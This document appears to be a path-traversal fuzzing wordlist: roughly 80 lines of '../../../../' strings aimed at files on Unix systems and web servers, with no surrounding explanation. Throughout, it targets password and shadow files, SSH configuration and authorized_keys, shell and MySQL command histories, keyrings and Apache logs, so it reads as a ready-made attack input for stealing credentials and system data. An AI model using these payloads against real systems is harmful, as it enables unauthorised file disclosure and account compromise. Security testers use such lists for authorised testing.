../../../../etc/passwd
../../../../etc/shadow
../../../../etc/hosts
../../../../etc/issue
../../../../etc/group
../../../../etc/security
../../../../etc/services
../../../../etc/pam.d
../../../../proc/cpuinfo
../../../../proc/meminfo
../../../../var/log/auth.log
../../../../var/log/syslog
../../../../var/log/dmesg
../../../../var/log/messages
../../../../var/log/maillog
../../../../var/www/html/index.php
../../../../usr/local/apache/logs/error_log
../../../../usr/local/apache/logs/access_log
../../../../usr/local/apache2/logs/error_log
../../../../usr/local/apache2/logs/access_log
../../../../apache/logs/error_log
../../../../apache/logs/access_log
../../../../etc/ssh/sshd_config
../../../../etc/ssh/ssh_config
../../../../home/user/.ssh/authorized_keys
../../../../home/user/.bashrc
../../../../home/user/.profile
../../../../home/user/.bash_profile
../../../../home/user/.bash_logout
../../../../home/user/.gitconfig
../../../../home/user/.mysql_history
../../../../home/user/.vimrc
../../../../home/user/.bash_history
../../../../home/user/.zshrc
../../../../home/user/.zsh_history
../../../../home/user/.xsession
../../../../home/user/.xsession-errors
../../../../home/user/.xinitrc
../../../../home/user/.config/user-dirs.dirs
../../../../home/user/.config/user-dirs.locale
../../../../home/user/.cache
../../../../home/user/.local
../../../../home/user/.local/share
../../../../home/user/.local/share/Trash
../../../../home/user/.local/share/recently-used.xbel
../../../../home/user/.local/share/gnome-shell
../../../../home/user/.local/share/keyrings
../../../../home/user/.local/share/icons
../../../../home/user/.local/share/applications
../../../../home/user/.local/share/files
../../../../home/user/.local/share/zeitgeist
../../../../home/user/.local/share/mime
../../../../home/user/.local/share/fonts
../../../../home/user/.local/share/telepathy
../../../../home/user/.local/share/gegl-0.4
../../../../home/user/.local/share/gegl-0.2
../../../../home/user/.local/share/xfce4
../../../../home/user/.local/share/gvfs-metadata
../../../../home/user/.local/share/recently-used.xbel
../../../../home/user/.local/share/mime/mime.cache
../../../../home/user/.local/share/mime/globs2
../../../../home/user/.local/share/mime/magic
../../../../home/user/.local/share/mime/aliases
../../../../home/user/.local/share/mime/generic-icons
../../../../home/user/.local/share/mime/icons
../../../../home/user/.local/share/mime/subclasses
../../../../home/user/.local/share/mime/treemagic
../../../../home/user/.local/share/mime/XMLnamespaces
../../../../home/user/.local/share/mime/inode
../../../../home/user/.local/share/mime/application
../../../../home/user/.local/share/mime/audio
../../../../home/user/.local/share/mime/font
../../../../home/user/.local/share/mime/image
../../../../home/user/.local/share/mime/message
../../../../home/user/.local/share/mime/model
../../../../home/user/.local/share/mime/multipart
../../../../home/user/.local/share/mime/text
../../../../home/user/.local/share/mime/video
../../../../home/user/.local/share/mime/x-gnome-saved

